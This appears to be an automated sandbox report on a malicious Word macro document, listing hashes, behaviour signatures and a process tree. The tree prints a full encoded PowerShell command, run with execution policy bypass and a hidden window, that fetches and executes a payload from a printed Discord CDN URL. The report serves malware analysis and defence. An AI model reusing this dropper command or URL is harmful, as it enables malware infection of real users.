Resubmissions

14-10-2021 18:15

211014-wvyn9sahbr 10

14-10-2021 17:51

211014-wfggfaahaj 10

14-10-2021 17:48

211014-wdmwfaaag5 10

Analysis

  • max time kernel
    136s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    14-10-2021 17:51

General

  • Target

    BIlls-8172135.doc

  • Size

    43KB

  • MD5

    12489be76fc04c1226707d1029f834a8

  • SHA1

    6aedf03afe4e5b7cb220d8541473243a9bd17179

  • SHA256

    ccff267f5824ca8d8480b9050ff631681b3d7a0817241374cfa65fc7a3b58476

  • SHA512

    1a7d7ddbc7f6da7e448ce83af6a3802c8e57bf1da8fe51e494e52c143ebda3759b0fbe044e1ecc394b02e3c7cba803ae2156dc781bb4242402bb8e58e55ee79b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/851105085270523917/895674622702399538/Server.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BIlls-8172135.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\mosad.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poweRSheLL.eXe -executIonPOLIcY ByPaSs -nOProfILe -WIndoWSTYLe HiDdeN -E JABTAFoAWABEAEMARgBWAEcAQgBIAE4ASgBTAEQARgBHAEgAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwA4ADUAMQAxADAANQAwADgANQAyADcAMAA1ADIAMwA5ADEANwAvADgAOQA1ADYANwA0ADYAMgAyADcAMAAyADMAOQA5ADUAMwA4AC8AUwBlAHIAdgBlAHIALgB0AHgAdAAnADsADQAKACQARQBEAFIARgBHAEgATgBKAE0ASwBEAEUARgBHAEgASgAgAD0AIAAnAG4ARQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAEUAYgBDACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAVAAnAC4AUgBlAHAAbABhAGMAZQAoACcALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAnACwAJwB0AC4AVwAnACkALgBSAGUAcABsAGEAYwBlACgAJwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACcALAAnAGwASQBFAE4AJwApADsADQAKACQAUwBYAEQAQwBGAFYARwBCAEgATgBKAFgARABDAEYAVgBHAEIASABKAEsAIAA9ACAAJwBEAE8AKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgBhAEQAUwBUADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgBHACcALgBSAGUAcABsAGEAYwBlACgAJwAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACcALAAnAFcAbgBMAG8AJwApAC4AUgBlAHAAbABhAGMAZQAoACcAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAHIASQBuACcAKQA7AA0ACgAkAFMAVwBYAEQARQBDAFIARgBHAFkASABVAEoASQBTAEQARgBWAEcASABKACAAPQAnAEkAYABFAFgAKABuAGAALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQBgAGMAYABUACAAJABFAEQAUgBGAEcASABOAEoATQBLAEQAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgA+AD4APgBHAEIASABOAEoAUwBEAEYARwBIACkAJwAuAFIAZQBwAGwAYQBjAGUAKAAnAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0AJwAsACcAZQBgAFcAYAAtAE8AYgBqAGAARQAnACkALgBSAGUAcABsAGEAYwBlACgAJwA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAEUARgBHAEgASgApAC4AJABTAFgARABDAEYAVgBHAEIASABOAEoAWABEAEMARgBWAEcAQgBIAEoASwAoACQAUwBaAFgARABDAEYAVgAnACkAOwANAAoAJgAoACcASQAnACsAJwBFAFgAJwApACgAJABTAFcAWABEAEUAQwBSAEYARwBZAEgAVQBKAEkAUwBEAEYAVgBHAEgASgAgAC0ASgBvAGkAbgAgACcAJwApAHwAJgAoACcASQAnACsAJwBFAFgAJwApADsA"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3164

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\mosad.bat
    MD5

    a685d75068195fb660a916c72d1ffbcc

    SHA1

    7444ec315ba2439a0388415074667739323541c6

    SHA256

    cc5a024786036aa094718ecc292f781bceed4cd6636885f4eec0ba285bd24570

    SHA512

    ba66ecea4e5179be1b8670d3e14cf6cfafe6b98b7b0527c79398c3adc026bb82e38284392f712499cbf2cd6afe4325844a244662f129df3767a2cb7c88b62397

  • memory/2116-258-0x0000000000000000-mapping.dmp
  • memory/2620-118-0x00007FF905D60000-0x00007FF905D70000-memory.dmp
    Filesize

    64KB

  • memory/2620-115-0x00007FF905D60000-0x00007FF905D70000-memory.dmp
    Filesize

    64KB

  • memory/2620-119-0x00007FF905D60000-0x00007FF905D70000-memory.dmp
    Filesize

    64KB

  • memory/2620-120-0x0000021A19A00000-0x0000021A19A02000-memory.dmp
    Filesize

    8KB

  • memory/2620-121-0x0000021A19A00000-0x0000021A19A02000-memory.dmp
    Filesize

    8KB

  • memory/2620-122-0x0000021A19A00000-0x0000021A19A02000-memory.dmp
    Filesize

    8KB

  • memory/2620-117-0x00007FF905D60000-0x00007FF905D70000-memory.dmp
    Filesize

    64KB

  • memory/2620-116-0x00007FF905D60000-0x00007FF905D70000-memory.dmp
    Filesize

    64KB

  • memory/3164-260-0x0000000000000000-mapping.dmp
  • memory/3164-284-0x000002A09D280000-0x000002A09D282000-memory.dmp
    Filesize

    8KB

  • memory/3164-285-0x000002A09D283000-0x000002A09D285000-memory.dmp
    Filesize

    8KB

  • memory/3164-286-0x000002A09D286000-0x000002A09D288000-memory.dmp
    Filesize

    8KB

  • memory/3164-304-0x000002A09D288000-0x000002A09D289000-memory.dmp
    Filesize

    4KB